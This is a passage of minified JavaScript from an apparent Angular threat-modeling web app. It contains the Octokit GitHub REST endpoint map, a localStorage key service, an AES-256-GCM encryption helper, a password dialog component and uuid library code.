/repos/{owner}/{repo}/compare/{base}...{head}"],compareCommitsWithBasehead:["GET /repos/{owner}/{repo}/compare/{basehead}"],createAutolink:["POST /repos/{owner}/{repo}/autolinks"],createCommitComment:["POST /repos/{owner}/{repo}/commits/{commit_sha}/comments"],createCommitSignatureProtection:["POST /repos/{owner}/{repo}/branches/{branch}/protection/required_signatures"],createCommitStatus:["POST /repos/{owner}/{repo}/statuses/{sha}"],createDeployKey:["POST /repos/{owner}/{repo}/keys"],createDeployment:["POST /repos/{owner}/{repo}/deployments"],createDeploymentBranchPolicy:["POST /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies"],createDeploymentStatus:["POST /repos/{owner}/{repo}/deployments/{deployment_id}/statuses"],createDispatchEvent:["POST /repos/{owner}/{repo}/dispatches"],createForAuthenticatedUser:["POST /user/repos"],createFork:["POST /repos/{owner}/{repo}/forks"],createInOrg:["POST /orgs/{org}/repos"],createOrUpdateEnvironment:["PUT /repos/{owner}/{repo}/environments/{environment_name}"],createOrUpdateFileContents:["PUT /repos/{owner}/{repo}/contents/{path}"],createPagesDeployment:["POST /repos/{owner}/{repo}/pages/deployment"],createPagesSite:["POST /repos/{owner}/{repo}/pages"],createRelease:["POST /repos/{owner}/{repo}/releases"],createTagProtection:["POST /repos/{owner}/{repo}/tags/protection"],createUsingTemplate:["POST /repos/{template_owner}/{template_repo}/generate"],createWebhook:["POST /repos/{owner}/{repo}/hooks"],declineInvitation:["DELETE /user/repository_invitations/{invitation_id}",{},{renamed:["repos","declineInvitationForAuthenticatedUser"]}],declineInvitationForAuthenticatedUser:["DELETE /user/repository_invitations/{invitation_id}"],delete:["DELETE /repos/{owner}/{repo}"],deleteAccessRestrictions:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/restrictions"],deleteAdminBranchProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/enforce_admins"],deleteAnEnvironment:["DELETE /repos/{owner}/{repo}/environments/{environment_name}"],deleteAutolink:["DELETE /repos/{owner}/{repo}/autolinks/{autolink_id}"],deleteBranchProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection"],deleteCommitComment:["DELETE /repos/{owner}/{repo}/comments/{comment_id}"],deleteCommitSignatureProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/required_signatures"],deleteDeployKey:["DELETE /repos/{owner}/{repo}/keys/{key_id}"],deleteDeployment:["DELETE /repos/{owner}/{repo}/deployments/{deployment_id}"],deleteDeploymentBranchPolicy:["DELETE /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies/{branch_policy_id}"],deleteFile:["DELETE /repos/{owner}/{repo}/contents/{path}"],deleteInvitation:["DELETE /repos/{owner}/{repo}/invitations/{invitation_id}"],deletePagesSite:["DELETE /repos/{owner}/{repo}/pages"],deletePullRequestReviewProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/required_pull_request_reviews"],deleteRelease:["DELETE /repos/{owner}/{repo}/releases/{release_id}"],deleteReleaseAsset:["DELETE /repos/{owner}/{repo}/releases/assets/{asset_id}"],deleteTagProtection:["DELETE /repos/{owner}/{repo}/tags/protection/{tag_protection_id}"],deleteWebhook:["DELETE /repos/{owner}/{repo}/hooks/{hook_id}"],disableAutomatedSecurityFixes:["DELETE /repos/{owner}/{repo}/automated-security-fixes"],disableLfsForRepo:["DELETE /repos/{owner}/{repo}/lfs"],disableVulnerabilityAlerts:["DELETE /repos/{owner}/{repo}/vulnerability-alerts"],downloadArchive:["GET /repos/{owner}/{repo}/zipball/{ref}",{},{renamed:["repos","downloadZipballArchive"]}],downloadTarballArchive:["GET /repos/{owner}/{repo}/tarball/{ref}"],downloadZipballArchive:["GET /repos/{owner}/{repo}/zipball/{ref}"],enableAutomatedSecurityFixes:["PUT /repos/{owner}/{repo}/automated-security-fixes"],enableLfsForRepo:["PUT /repos/{owner}/{repo}/lfs"],enableVulnerabilityAlerts:["PUT /repos/{owner}/{repo}/vulnerability-alerts"],generateReleaseNotes:["POST /repos/{owner}/{repo}/releases/generate-notes"],get:["GET /repos/{owner}/{repo}"],getAccessRestrictions:["GET /repos/{owner}/{repo}/branches/{branch}/protection/restrictions"],getAdminBranchProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection/enforce_admins"],getAllEnvironments:["GET /repos/{owner}/{repo}/environments"],getAllStatusCheckContexts:["GET /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks/contexts"],getAllTopics:["GET /repos/{owner}/{repo}/topics"],getAppsWithAccessToProtectedBranch:["GET /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/apps"],getAutolink:["GET /repos/{owner}/{repo}/autolinks/{autolink_id}"],getBranch:["GET /repos/{owner}/{repo}/branches/{branch}"],getBranchProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection"],getClones:["GET /repos/{owner}/{repo}/traffic/clones"],getCodeFrequencyStats:["GET /repos/{owner}/{repo}/stats/code_frequency"],getCollaboratorPermissionLevel:["GET /repos/{owner}/{repo}/collaborators/{username}/permission"],getCombinedStatusForRef:["GET /repos/{owner}/{repo}/commits/{ref}/status"],getCommit:["GET /repos/{owner}/{repo}/commits/{ref}"],getCommitActivityStats:["GET /repos/{owner}/{repo}/stats/commit_activity"],getCommitComment:["GET /repos/{owner}/{repo}/comments/{comment_id}"],getCommitSignatureProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection/required_signatures"],getCommunityProfileMetrics:["GET /repos/{owner}/{repo}/community/profile"],getContent:["GET /repos/{owner}/{repo}/contents/{path}"],getContributorsStats:["GET /repos/{owner}/{repo}/stats/contributors"],getDeployKey:["GET /repos/{owner}/{repo}/keys/{key_id}"],getDeployment:["GET /repos/{owner}/{repo}/deployments/{deployment_id}"],getDeploymentBranchPolicy:["GET /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies/{branch_policy_id}"],getDeploymentStatus:["GET /repos/{owner}/{repo}/deployments/{deployment_id}/statuses/{status_id}"],getEnvironment:["GET /repos/{owner}/{repo}/environments/{environment_name}"],getLatestPagesBuild:["GET /repos/{owner}/{repo}/pages/builds/latest"],getLatestRelease:["GET /repos/{owner}/{repo}/releases/latest"],getPages:["GET /repos/{owner}/{repo}/pages"],getPagesBuild:["GET /repos/{owner}/{repo}/pages/builds/{build_id}"],getPagesHealthCheck:["GET /repos/{owner}/{repo}/pages/health"],getParticipationStats:["GET /repos/{owner}/{repo}/stats/participation"],getPullRequestReviewProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection/required_pull_request_reviews"],getPunchCardStats:["GET /repos/{owner}/{repo}/stats/punch_card"],getReadme:["GET /repos/{owner}/{repo}/readme"],getReadmeInDirectory:["GET /repos/{owner}/{repo}/readme/{dir}"],getRelease:["GET /repos/{owner}/{repo}/releases/{release_id}"],getReleaseAsset:["GET /repos/{owner}/{repo}/releases/assets/{asset_id}"],getReleaseByTag:["GET /repos/{owner}/{repo}/releases/tags/{tag}"],getStatusChecksProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks"],getTeamsWithAccessToProtectedBranch:["GET /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/teams"],getTopPaths:["GET /repos/{owner}/{repo}/traffic/popular/paths"],getTopReferrers:["GET /repos/{owner}/{repo}/traffic/popular/referrers"],getUsersWithAccessToProtectedBranch:["GET /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/users"],getViews:["GET /repos/{owner}/{repo}/traffic/views"],getWebhook:["GET /repos/{owner}/{repo}/hooks/{hook_id}"],getWebhookConfigForRepo:["GET /repos/{owner}/{repo}/hooks/{hook_id}/config"],getWebhookDelivery:["GET /repos/{owner}/{repo}/hooks/{hook_id}/deliveries/{delivery_id}"],listAutolinks:["GET /repos/{owner}/{repo}/autolinks"],listBranches:["GET /repos/{owner}/{repo}/branches"],listBranchesForHeadCommit:["GET /repos/{owner}/{repo}/commits/{commit_sha}/branches-where-head"],listCollaborators:["GET /repos/{owner}/{repo}/collaborators"],listCommentsForCommit:["GET /repos/{owner}/{repo}/commits/{commit_sha}/comments"],listCommitCommentsForRepo:["GET /repos/{owner}/{repo}/comments"],listCommitStatusesForRef:["GET /repos/{owner}/{repo}/commits/{ref}/statuses"],listCommits:["GET /repos/{owner}/{repo}/commits"],listContributors:["GET /repos/{owner}/{repo}/contributors"],listDeployKeys:["GET /repos/{owner}/{repo}/keys"],listDeploymentBranchPolicies:["GET /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies"],listDeploymentStatuses:["GET /repos/{owner}/{repo}/deployments/{deployment_id}/statuses"],listDeployments:["GET /repos/{owner}/{repo}/deployments"],listForAuthenticatedUser:["GET /user/repos"],listForOrg:["GET /orgs/{org}/repos"],listForUser:["GET /users/{username}/repos"],listForks:["GET /repos/{owner}/{repo}/forks"],listInvitations:["GET /repos/{owner}/{repo}/invitations"],listInvitationsForAuthenticatedUser:["GET /user/repository_invitations"],listLanguages:["GET /repos/{owner}/{repo}/languages"],listPagesBuilds:["GET /repos/{owner}/{repo}/pages/builds"],listPublic:["GET /repositories"],listPullRequestsAssociatedWithCommit:["GET /repos/{owner}/{repo}/commits/{commit_sha}/pulls"],listReleaseAssets:["GET /repos/{owner}/{repo}/releases/{release_id}/assets"],listReleases:["GET /repos/{owner}/{repo}/releases"],listTagProtection:["GET /repos/{owner}/{repo}/tags/protection"],listTags:["GET /repos/{owner}/{repo}/tags"],listTeams:["GET /repos/{owner}/{repo}/teams"],listWebhookDeliveries:["GET /repos/{owner}/{repo}/hooks/{hook_id}/deliveries"],listWebhooks:["GET /repos/{owner}/{repo}/hooks"],merge:["POST /repos/{owner}/{repo}/merges"],mergeUpstream:["POST /repos/{owner}/{repo}/merge-upstream"],pingWebhook:["POST /repos/{owner}/{repo}/hooks/{hook_id}/pings"],redeliverWebhookDelivery:["POST /repos/{owner}/{repo}/hooks/{hook_id}/deliveries/{delivery_id}/attempts"],removeAppAccessRestrictions:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/apps",{},{mapToData:"apps"}],removeCollaborator:["DELETE /repos/{owner}/{repo}/collaborators/{username}"],removeStatusCheckContexts:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks/contexts",{},{mapToData:"contexts"}],removeStatusCheckProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks"],removeTeamAccessRestrictions:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/teams",{},{mapToData:"teams"}],removeUserAccessRestrictions:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/users",{},{mapToData:"users"}],renameBranch:["POST /repos/{owner}/{repo}/branches/{branch}/rename"],replaceAllTopics:["PUT /repos/{owner}/{repo}/topics"],requestPagesBuild:["POST /repos/{owner}/{repo}/pages/builds"],setAdminBranchProtection:["POST /repos/{owner}/{repo}/branches/{branch}/protection/enforce_admins"],setAppAccessRestrictions:["PUT /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/apps",{},{mapToData:"apps"}],setStatusCheckContexts:["PUT /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks/contexts",{},{mapToData:"contexts"}],setTeamAccessRestrictions:["PUT /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/teams",{},{mapToData:"teams"}],setUserAccessRestrictions:["PUT /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/users",{},{mapToData:"users"}],testPushWebhook:["POST /repos/{owner}/{repo}/hooks/{hook_id}/tests"],transfer:["POST /repos/{owner}/{repo}/transfer"],update:["PATCH /repos/{owner}/{repo}"],updateBranchProtection:["PUT /repos/{owner}/{repo}/branches/{branch}/protection"],updateCommitComment:["PATCH /repos/{owner}/{repo}/comments/{comment_id}"],updateDeploymentBranchPolicy:["PUT /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies/{branch_policy_id}"],updateInformationAboutPagesSite:["PUT /repos/{owner}/{repo}/pages"],updateInvitation:["PATCH /repos/{owner}/{repo}/invitations/{invitation_id}"],updatePullRequestReviewProtection:["PATCH /repos/{owner}/{repo}/branches/{branch}/protection/required_pull_request_reviews"],updateRelease:["PATCH /repos/{owner}/{repo}/releases/{release_id}"],updateReleaseAsset:["PATCH /repos/{owner}/{repo}/releases/assets/{asset_id}"],updateStatusCheckPotection:["PATCH /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks",{},{renamed:["repos","updateStatusCheckProtection"]}],updateStatusCheckProtection:["PATCH /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks"],updateWebhook:["PATCH /repos/{owner}/{repo}/hooks/{hook_id}"],updateWebhookConfigForRepo:["PATCH /repos/{owner}/{repo}/hooks/{hook_id}/config"],uploadReleaseAsset:["POST /repos/{owner}/{repo}/releases/{release_id}/assets{?name,label}",{baseUrl:"https://uploads.github.com"}]},search:{code:["GET /search/code"],commits:["GET /search/commits"],issuesAndPullRequests:["GET /search/issues"],labels:["GET /search/labels"],repos:["GET /search/repositories"],topics:["GET /search/topics"],users:["GET /search/users"]},secretScanning:{getAlert:["GET /repos/{owner}/{repo}/secret-scanning/alerts/{alert_number}"],listAlertsForEnterprise:["GET /enterprises/{enterprise}/secret-scanning/alerts"],listAlertsForOrg:["GET /orgs/{org}/secret-scanning/alerts"],listAlertsForRepo:["GET /repos/{owner}/{repo}/secret-scanning/alerts"],listLocationsForAlert:["GET /repos/{owner}/{repo}/secret-scanning/alerts/{alert_number}/locations"],updateAlert:["PATCH /repos/{owner}/{repo}/secret-scanning/alerts/{alert_number}"]},teams:{addOrUpdateMembershipForUserInOrg:["PUT /orgs/{org}/teams/{team_slug}/memberships/{username}"],addOrUpdateProjectPermissionsInOrg:["PUT /orgs/{org}/teams/{team_slug}/projects/{project_id}"],addOrUpdateRepoPermissionsInOrg:["PUT /orgs/{org}/teams/{team_slug}/repos/{owner}/{repo}"],checkPermissionsForProjectInOrg:["GET /orgs/{org}/teams/{team_slug}/projects/{project_id}"],checkPermissionsForRepoInOrg:["GET /orgs/{org}/teams/{team_slug}/repos/{owner}/{repo}"],create:["POST /orgs/{org}/teams"],createDiscussionCommentInOrg:["POST /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments"],createDiscussionInOrg:["POST /orgs/{org}/teams/{team_slug}/discussions"],deleteDiscussionCommentInOrg:["DELETE /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}"],deleteDiscussionInOrg:["DELETE /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}"],deleteInOrg:["DELETE /orgs/{org}/teams/{team_slug}"],getByName:["GET /orgs/{org}/teams/{team_slug}"],getDiscussionCommentInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}"],getDiscussionInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}"],getMembershipForUserInOrg:["GET /orgs/{org}/teams/{team_slug}/memberships/{username}"],list:["GET /orgs/{org}/teams"],listChildInOrg:["GET /orgs/{org}/teams/{team_slug}/teams"],listDiscussionCommentsInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments"],listDiscussionsInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions"],listForAuthenticatedUser:["GET /user/teams"],listMembersInOrg:["GET /orgs/{org}/teams/{team_slug}/members"],listPendingInvitationsInOrg:["GET /orgs/{org}/teams/{team_slug}/invitations"],listProjectsInOrg:["GET /orgs/{org}/teams/{team_slug}/projects"],listReposInOrg:["GET /orgs/{org}/teams/{team_slug}/repos"],removeMembershipForUserInOrg:["DELETE /orgs/{org}/teams/{team_slug}/memberships/{username}"],removeProjectInOrg:["DELETE /orgs/{org}/teams/{team_slug}/projects/{project_id}"],removeRepoInOrg:["DELETE /orgs/{org}/teams/{team_slug}/repos/{owner}/{repo}"],updateDiscussionCommentInOrg:["PATCH /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}"],updateDiscussionInOrg:["PATCH /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}"],updateInOrg:["PATCH /orgs/{org}/teams/{team_slug}"]},users:{addEmailForAuthenticated:["POST /user/emails",{},{renamed:["users","addEmailForAuthenticatedUser"]}],addEmailForAuthenticatedUser:["POST /user/emails"],block:["PUT /user/blocks/{username}"],checkBlocked:["GET /user/blocks/{username}"],checkFollowingForUser:["GET /users/{username}/following/{target_user}"],checkPersonIsFollowedByAuthenticated:["GET /user/following/{username}"],createGpgKeyForAuthenticated:["POST /user/gpg_keys",{},{renamed:["users","createGpgKeyForAuthenticatedUser"]}],createGpgKeyForAuthenticatedUser:["POST /user/gpg_keys"],createPublicSshKeyForAuthenticated:["POST /user/keys",{},{renamed:["users","createPublicSshKeyForAuthenticatedUser"]}],createPublicSshKeyForAuthenticatedUser:["POST /user/keys"],createSshSigningKeyForAuthenticatedUser:["POST /user/ssh_signing_keys"],deleteEmailForAuthenticated:["DELETE /user/emails",{},{renamed:["users","deleteEmailForAuthenticatedUser"]}],deleteEmailForAuthenticatedUser:["DELETE /user/emails"],deleteGpgKeyForAuthenticated:["DELETE /user/gpg_keys/{gpg_key_id}",{},{renamed:["users","deleteGpgKeyForAuthenticatedUser"]}],deleteGpgKeyForAuthenticatedUser:["DELETE /user/gpg_keys/{gpg_key_id}"],deletePublicSshKeyForAuthenticated:["DELETE /user/keys/{key_id}",{},{renamed:["users","deletePublicSshKeyForAuthenticatedUser"]}],deletePublicSshKeyForAuthenticatedUser:["DELETE /user/keys/{key_id}"],deleteSshSigningKeyForAuthenticatedUser:["DELETE /user/ssh_signing_keys/{ssh_signing_key_id}"],follow:["PUT /user/following/{username}"],getAuthenticated:["GET /user"],getByUsername:["GET /users/{username}"],getContextForUser:["GET /users/{username}/hovercard"],getGpgKeyForAuthenticated:["GET /user/gpg_keys/{gpg_key_id}",{},{renamed:["users","getGpgKeyForAuthenticatedUser"]}],getGpgKeyForAuthenticatedUser:["GET /user/gpg_keys/{gpg_key_id}"],getPublicSshKeyForAuthenticated:["GET /user/keys/{key_id}",{},{renamed:["users","getPublicSshKeyForAuthenticatedUser"]}],getPublicSshKeyForAuthenticatedUser:["GET /user/keys/{key_id}"],getSshSigningKeyForAuthenticatedUser:["GET /user/ssh_signing_keys/{ssh_signing_key_id}"],list:["GET /users"],listBlockedByAuthenticated:["GET /user/blocks",{},{renamed:["users","listBlockedByAuthenticatedUser"]}],listBlockedByAuthenticatedUser:["GET /user/blocks"],listEmailsForAuthenticated:["GET /user/emails",{},{renamed:["users","listEmailsForAuthenticatedUser"]}],listEmailsForAuthenticatedUser:["GET /user/emails"],listFollowedByAuthenticated:["GET /user/following",{},{renamed:["users","listFollowedByAuthenticatedUser"]}],listFollowedByAuthenticatedUser:["GET /user/following"],listFollowersForAuthenticatedUser:["GET /user/followers"],listFollowersForUser:["GET /users/{username}/followers"],listFollowingForUser:["GET /users/{username}/following"],listGpgKeysForAuthenticated:["GET /user/gpg_keys",{},{renamed:["users","listGpgKeysForAuthenticatedUser"]}],listGpgKeysForAuthenticatedUser:["GET /user/gpg_keys"],listGpgKeysForUser:["GET /users/{username}/gpg_keys"],listPublicEmailsForAuthenticated:["GET /user/public_emails",{},{renamed:["users","listPublicEmailsForAuthenticatedUser"]}],listPublicEmailsForAuthenticatedUser:["GET /user/public_emails"],listPublicKeysForUser:["GET /users/{username}/keys"],listPublicSshKeysForAuthenticated:["GET /user/keys",{},{renamed:["users","listPublicSshKeysForAuthenticatedUser"]}],listPublicSshKeysForAuthenticatedUser:["GET /user/keys"],listSshSigningKeysForAuthenticatedUser:["GET /user/ssh_signing_keys"],listSshSigningKeysForUser:["GET /users/{username}/ssh_signing_keys"],setPrimaryEmailVisibilityForAuthenticated:["PATCH /user/email/visibility",{},{renamed:["users","setPrimaryEmailVisibilityForAuthenticatedUser"]}],setPrimaryEmailVisibilityForAuthenticatedUser:["PATCH /user/email/visibility"],unblock:["DELETE /user/blocks/{username}"],unfollow:["DELETE /user/following/{username}"],updateAuthenticated:["PATCH /user"]}};function owe(t,a,e,i,n){const r=t.request.defaults(i);return Object.assign(function c(...d){let T=r.endpoint.merge(...d);if(n.mapToData)return T=Object.assign({},T,{data:T[n.mapToData],[n.mapToData]:void 0}),r(T);if(n.renamed){const[k,q]=n.renamed;t.log.warn(`octokit.${a}.${e}() has been renamed to octokit.${k}.${q}()`)}if(n.deprecated&&t.log.warn(n.deprecated),n.renamedParameters){const k=r.endpoint.merge(...d);for(const[q,Y]of Object.entries(n.renamedParameters))q in k&&(t.log.warn(`"${q}" parameter is deprecated for "octokit.${a}.${e}()". Use "${Y}" instead`),Y in k||(k[Y]=k[q]),delete k[q]);return r(k)}return r(...d)},r)}function hG(t){const a=function uG(t,a){const e={};for(const[i,n]of Object.entries(a))for(const[r,c]of Object.entries(n)){const[d,T,k]=c,[q,Y]=d.split(/ /),te=Object.assign({method:q,url:Y},T);e[i]||(e[i]={});e[i][r]=k?owe(t,i,r,te,k):t.request.defaults(te)}return e}(t,dG);return L7(ZT({},a),{rest:a})}hG.VERSION="6.8.1";const Rl=p5.plugin(rG,hG,lG).defaults({userAgent:"octokit-rest.js/19.0.5"});var si=(()=>{return(t=si||(si={})).AUTH_KEEP_SIGNED_IN="keep_signed_in",t.AUTH_ACCESS_TOKEN="auth_access_token",t.AUTH_GUEST="auth_guest",t.AUTH_LAST_CODE="auth_last_code",t.COOKIE_CONSENT="cookie_consent",t.CURRENT_VERSION="current_verison",t.CVE_SEARCH_HISTORY="cve_search_history",t.DARK_MODE="dark_mode",t.DIALOG_WARNING_CONSENT="dialog_warning_consent",t.GH_ACCOUNT_NAME="github_account_name",t.GH_USER_NAME="github_user_name",t.GH_USER_URL="github_user_url",t.GH_USER_EMAIL="github_user_email",t.LANGUAGE="language",t.LAST_FILE="last_project",t.MSG_SHOW_ERROR="msg_show_error",t.MSG_SHOW_WARNING="msg_show_warning",t.MSG_SHOW_SUCCESS="msg_show_success",t.MSG_SHOW_INFO="msg_show_info",t.MSG_SHOW_UNSAVED_CHANGED="msg_show_unsaved_changes",t.PAGE_CONFIG_TAB_INDEX="page_config_tab_index",t.PAGE_CONFIG_SPLIT_SIZE_1="page_config_split_size_1",t.PAGE_CONFIG_CHECKLISTS_TAB_INDEX="page_config_checklists_tab_index",t.PAGE_CONFIG_CHECKLISTS_SPLIT_SIZE_X="page_config_checklists_split_size_",t.PAGE_CONFIG_COMPONENTS_TAB_INDEX="page_config_components_tab_index",t.PAGE_CONFIG_STENCILS_TAB_INDEX="page_config_stencils_tab_index",t.PAGE_DASHBOARD_SPLIT_SIZE_X="page_dashboard_split_size_",t.PAGE_MITIGATION_SPLIT_SIZE_X="page_mitigation_split_size_",t.PAGE_MODELING_SPLIT_SIZE_X="page_modeling_split_size_",t.PAGE_MODELING_ASSETS_SPLIT_SIZE_X="page_modeling_assets_split_size_",t.PAGE_MODELING_ASSETS_TAB_INDEX="page_modeling_assets_tab_index",t.PAGE_MODELING_CONTAINERTREE_KEEP_STRUC="page_modeling_containertree_keep_struc",t.PAGE_MODELING_CONTAINERTREE_SHOW_SCEN="page_modeling_containertree_show_scen",t.PAGE_MODELING_CONTAINERTREE_SHOW_MEAS="page_modeling_containertree_show_meas",t.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT="page_modeling_diagram_anchor_count",t.PAGE_MODELING_DIAGRAM_ARROW_BEND="page_modeling_diagram_arrow_bend",t.PAGE_MODELING_DIAGRAM_ARROW_NAME="page_modeling_diagram_arrow_name",t.PAGE_MODELING_DIAGRAM_ARROW_POS="page_modeling_diagram_arrow_pos",t.PAGE_MODELING_DIAGRAM_SHOW_GRID="page_modeling_diagram_show_grid",t.PAGE_MODELING_DIAGRAM_STICK_GRID="page_modeling_diagram_stick_grid",t.PAGE_MODELING_DIAGRAM_TEXTSIZE_INDEX="page_modeling_diagram_textsize_index",t.PAGE_MODELING_DIAGRAM_ZOOM="page_modeling_diagram_zoom",t.PAGE_MODELING_MODEL_TAB_INDEX="page_modeling_model_tab_index",t.PAGE_MODELING_THREAT_IDENT_TAB_INDEX="page_modeling_threat_ident_tab_index",t.PAGE_REPORTING_DIAGRAM_SHOW_GRID="page_reporting_diagram_show_grid",t.PAGE_REPORTING_SHOW_CHARTS="page_reporting_show_charts",t.PAGE_REPORTING_SHOW_FIRST_STEPS="page_reporting_show_first_steps",t.PAGE_REPORTING_SHOW_TEST_CASES="page_reporting_show_test_cases",t.PAGE_RISK_SPLIT_SIZE_X="page_risk_split_size_",t.FILE_HISTORY="project_history",t.SPELL_CHECK="spell_check",t.WELCOME_TOUR_STARTED="welcome_tour_started",si;var t})();let _r=(()=>{class t{Set(e,i){localStorage.setItem(e,i)}Get(e){return localStorage.getItem(e)}Remove(e){localStorage.removeItem(e)}Clear(){localStorage.clear()}ResetLayout(){this.Remove(si.PAGE_CONFIG_SPLIT_SIZE_1);for(let e=0;e<5;e++)this.Remove(si.PAGE_CONFIG_CHECKLISTS_SPLIT_SIZE_X+e.toString()),this.Remove(si.PAGE_DASHBOARD_SPLIT_SIZE_X+e.toString()),this.Remove(si.PAGE_DASHBOARD_SPLIT_SIZE_X+e.toString()),this.Remove(si.PAGE_MITIGATION_SPLIT_SIZE_X+e.toString()),this.Remove(si.PAGE_MODELING_ASSETS_SPLIT_SIZE_X+e.toString())}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();var g2=de(882),g5=de(5449).Buffer;const fG="aes-256-gcm";class y5{constructor(a){this.secret=a}getKey(a){return g2.Sf(this.secret,a,1e5,32,"sha512")}GetRandom(a){return g2.O6(a)}Encrypt(a){const e=g2.O6(16),i=g2.O6(64),n=this.getKey(i),r=g2.CW(fG,n,e),c=g5.concat([r.update(String(a),"utf8"),r.final()]),d=r.getAuthTag();return g5.concat([i,e,d,c]).toString("base64")}Decrypt(a){const e=g5.from(String(a),"base64"),i=e.slice(0,64),n=e.slice(64,80),r=e.slice(80,96),c=e.slice(96),d=this.getKey(i),T=g2.G_(fG,d,n);return T.setAuthTag(r),T.update(c)+T.final("utf8")}}function lwe(t,a){if(1&t&&(m(0,"div",9),s(1),u()),2&t){const e=V();g(1),ct("\n ",e.data.file,"\n ")}}let dwe=(()=>{class t{constructor(e,i){this.dialogRef=e,this.data=i,this.show=!1}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(_p))},t.\u0275cmp=Wt({type:t,selectors:[["app-password-dialog"]],decls:32,vars:17,consts:[["mat-dialog-title",""],["mat-dialog-content",""],["style","margin-bottom: 10px;",4,"ngIf"],[2,"width","100%"],["matInput","",3,"type","ngModel","ngModelChange","keydown.enter"],["matSuffix","",3,"click"],["mat-dialog-actions","",2,"float","right"],["mat-button","","mat-dialog-close",""],["mat-button","",3,"mat-dialog-close"],[2,"margin-bottom","10px"]],template:function(e,i){1&e&&(m(0,"h1",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"div",1),s(5,"\n "),ne(6,lwe,2,1,"div",2),s(7,"\n "),m(8,"mat-form-field",3),s(9,"\n "),m(10,"mat-label"),s(11),oe(12,"translate"),u(),s(13,"\n "),m(14,"input",4),he("ngModelChange",function(r){return i.data.pw=r})("keydown.enter",function(){return i.dialogRef.close(!0)}),u(),s(15,"\n "),m(16,"mat-icon",5),he("click",function(){return i.show=!i.show}),s(17),u(),s(18,"\n "),u(),s(19,"\n"),u(),s(20,"\n"),m(21,"div",6),s(22,"\n "),m(23,"button",7),s(24),oe(25,"translate"),u(),s(26,"\n "),m(27,"button",8),s(28),oe(29,"translate"),u(),s(30,"\n"),u(),s(31,"\n")),2&e&&(g(1),ke(re(2,9,"dialog.password.title")),g(5),F("ngIf",i.data.file),g(5),ke(re(12,11,"dialog.password.enterpassword")),g(3),F("type",i.show?"text":"password")("ngModel",i.data.pw),g(3),ke(i.show?"visibility_off":"visibility"),g(7),ke(re(25,13,"general.Cancel")),g(3),F("mat-dialog-close",!0),g(1),ke(re(29,15,"general.OK")))},dependencies:[Ri,an,Ta,Ea,oa,da,nn,un,jr,Xa,vm,Am,Tm,Em,Xi]}),t})();class Gi{static FindUniqueName(a,e){const n=e.filter(d=>d.startsWith(a)),c=n.filter(d=>(d=>{if(!d)return!1;for(let T=0;T<(null==d?void 0:d.length);T++)if(!(d[T]>="0"&&d[T]<="9"))return!1;return!0})(d[a.length])).map(d=>d.replace("-Reference","")).map(d=>Number(d.replace(a,"")));return 0==c.length?0==n.length||1==n.length&&n[0]!=a?a:a+"2":a+(Math.max(...c)+1).toString()}static GetNumber(a){let e="";for(let i=a.length-1;i>=0&&a[i]>="0"&&a[i]<="9";i--)e=a[i]+e;return e}static FromCamelCase(a){if(0==a.length)return"";let e=a[0];for(let i=1;i="A"&&n<="Z"&&(r>="a"&&r<="z"||r>="0"&&r<="9")&&(e+=" "),e+=n}return e}static Format(a,...e){return a.replace(/{(\d+)}/g,(i,n)=>void 0!==e[n]?e[n]:i)}static EmptyIfNull(a){return null==a?"":a}static NullOrEmpty(a){return null==a||""==a}}const gG={randomUUID:"undefined"!=typeof crypto&&crypto.randomUUID&&crypto.randomUUID.bind(crypto)};let hT;const mwe=new Uint8Array(16);function uwe(){if(!hT&&(hT="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto),!hT))throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return hT(mwe)}const sc=[];for(let t=0;t<256;++t)sc.push((t+256).toString(16).slice(1));const Fo=function hwe(t,a,e){if(gG.randomUUID&&!a&&!t)return gG.randomUUID();const i=(t=t||{}).random||(t.rng||uwe)();if(i[6]=15&i[6]|64,i[8]=63&i[8]|128,a){e=e||0;for(let 